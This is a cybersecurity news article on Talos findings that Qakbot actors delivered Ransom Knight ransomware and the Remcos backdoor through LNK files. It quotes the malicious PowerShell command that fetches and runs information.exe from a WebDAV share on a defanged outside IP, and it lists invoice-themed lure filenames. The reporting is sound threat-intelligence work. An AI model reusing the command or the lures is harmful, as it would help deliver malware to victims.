Thursday, November 14, 2024
HomeCyber Security NewsQakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files

Qakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files

Published on

Malware protection

Qakbot’s infrastructure and cryptocurrency assets were seized by government authorities in an operation in August 2023 with the assistance of international allies, raising concerns about the affiliates of Qakbot.

Talos researchers moderately believe Qakbot threat actors remain active, launching a recent campaign with Cyclops/Ransom Knight ransomware and the Remcos backdoor, tracked through LNK file metadata connections to past campaigns.

Talos researchers used LNK file metadata to trace threat actors, linking the “AA” and “BB” campaigns in January 2023. 

- Advertisement - SIEM as a Service

After their report, Qakbot actors in the “AA,” “BB,” and “Obama” campaigns began removing LNK file metadata to evade detection and tracking.

Document
FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Technical analysis

New LNK files from the same system were discovered by Talos in August 2023, leading to a network share that contained the ransomware Ransom Knight. According to analysis, they direct users to Powershell.exe and pass parameters for the subsequent download step:-

  • -c “explorer ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Executing Explorer.exe to access remote IP 89[.]23[.]96[.]203 via WebDAV (port 80) might evade command line detection for PowerShell remote executable downloads (T1105). 

These LNK filenames hint at urgent financial topics, indicating phishing in Qakbot campaigns. Here below, we have mentioned all the filenames of the LNK files:-

  • ATTENTION-Invoice-29-August.docx.lnk
  • bank transfer request.lnk
  • Booking info.pdf.lnk
  • Fattura NON pagata Agosto 2023.docx.lnk
  • FRAUD bank transfer report.pdf.lnk
  • invoice OTP bank.pdf.lnk
  • MANDATORY-Invoice-28-August.docx.lnk
  • NOT-paid-Invoice-26-August.pdf.lnk
  • Nuove coordinate bancarie e IBAN 2023.docx.lnk
  • Nuove coordinate bancarie e IBAN 2023.img.lnk
  • Pay-Invoices-29-August.pdf.lnk
  • URGENT-Invoice-27-August.docx.lnk

Italian filenames hint at regional targeting, while LNK files in Zip archives accompany XLL files, typically associated with Excel add-ins and similar icons.

The LNK file fetches the Ransom Knight payload from remote IP 89[.]23[.]96[.]203 via WebDAV, marking an evolved version of the Cyclops ransomware, announced by its operator in May 2023

Experts suggest that Qakbot threat actors are customers, not operators, of the ransomware service. The FBI operation in August 2023 mainly targeted control servers, leaving email delivery unaffected. 

While Qakbot distribution paused post-takedown, the threat could resurge if the operators rebuild their infrastructure.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.

Tushar Subhra
Tushar Subhra
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Windows 0-Day Exploited in Wild with Single Right Click

A newly discovered zero-day vulnerability, CVE-2024-43451, has been actively exploited in the wild, targeting Windows...

Automating Identity and Access Management for Modern Enterprises

Keeping track of who has access and managing their permissions has gotten a lot...

Finding The Right E-Commerce Platform – Comparing Reselling Solutions

If you’re looking to make some extra cash or to start a business, you...

Fortinet Patches Critical Flaws That Affected Multiple Products

Fortinet, a leading cybersecurity provider, has issued patches for several critical vulnerabilities impacting multiple...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Windows 0-Day Exploited in Wild with Single Right Click

A newly discovered zero-day vulnerability, CVE-2024-43451, has been actively exploited in the wild, targeting Windows...

Fortinet Patches Critical Flaws That Affected Multiple Products

Fortinet, a leading cybersecurity provider, has issued patches for several critical vulnerabilities impacting multiple...

China-Nexus Actors Hijack Websites to Deliver Cobalt Strike malware

A Chinese state-sponsored threat group, identified as TAG-112, has been discovered hijacking Tibetan community...